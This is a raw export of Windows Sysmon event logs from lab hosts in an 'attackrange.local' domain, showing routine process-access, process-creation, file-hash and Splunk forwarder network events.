07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.385{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE1483C21984D3C757BC17CECAC527B4,SHA256=13045A6EC6783999944B48161D755F045236A9B8559ECB997DA8C9F48FDCB7D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:29.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9568DAA0F16D3EAB457928956F7986,SHA256=3F19CDEAE38C05AAF945808CC7A0F2FD743E931EE0CDE4E56672D0CF6C763E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:29.619{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15ED40D8446262D509D78E479070F9C2,SHA256=4176F56C52FF247569E388692B71865FB7967882DE40D71D2999FB36548C8716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:29.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F759C74E7E1A094FF8D6609CDC60F6,SHA256=67F937A3F84174A362B94A1596DE561640B9CB2097EEF65EFA4B8931E886AA2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:29.055{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ABE9E0CAA6C1EA4C940E26CA1DA6D832,SHA256=4B5AE25A4369DBD83241BEAB4F76C7D39BE3A6F5146E8FDCF8D798C5ED783491,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:30.955{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5A8BCA8FA9BEA6B1480B2F647CB223,SHA256=975E8C64C3B5D3BE4A264B3CE3912DA2A1DFB1C67C2B12A6DAFE8E93E415B1F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:30.556{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26327A7926ACBC9669424835236596BE,SHA256=2A3DB332427C2D6E5FFA228AA37B33FACDFCAC8F6F107AAF25EB681703CF91D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:20.772{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51099-false10.0.1.12-8000- 23542300x8000000000000000808558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:30.134{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D5606BEC98489357046B4286F7411012,SHA256=041D709EA095618CCF7AF1EB6C88E4D47EB2FDBC5A156A18A82EDDB7CDD452E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:31.603{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CB4C646516C8B2E3C1E5FA982F81ED2,SHA256=087F19D4BAD83270A2BC9EC06499E52E442E9689945668099FD7019668468C40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.969{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.967{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.966{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.950{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.948{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.947{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.947{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.947{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.933{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001051128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
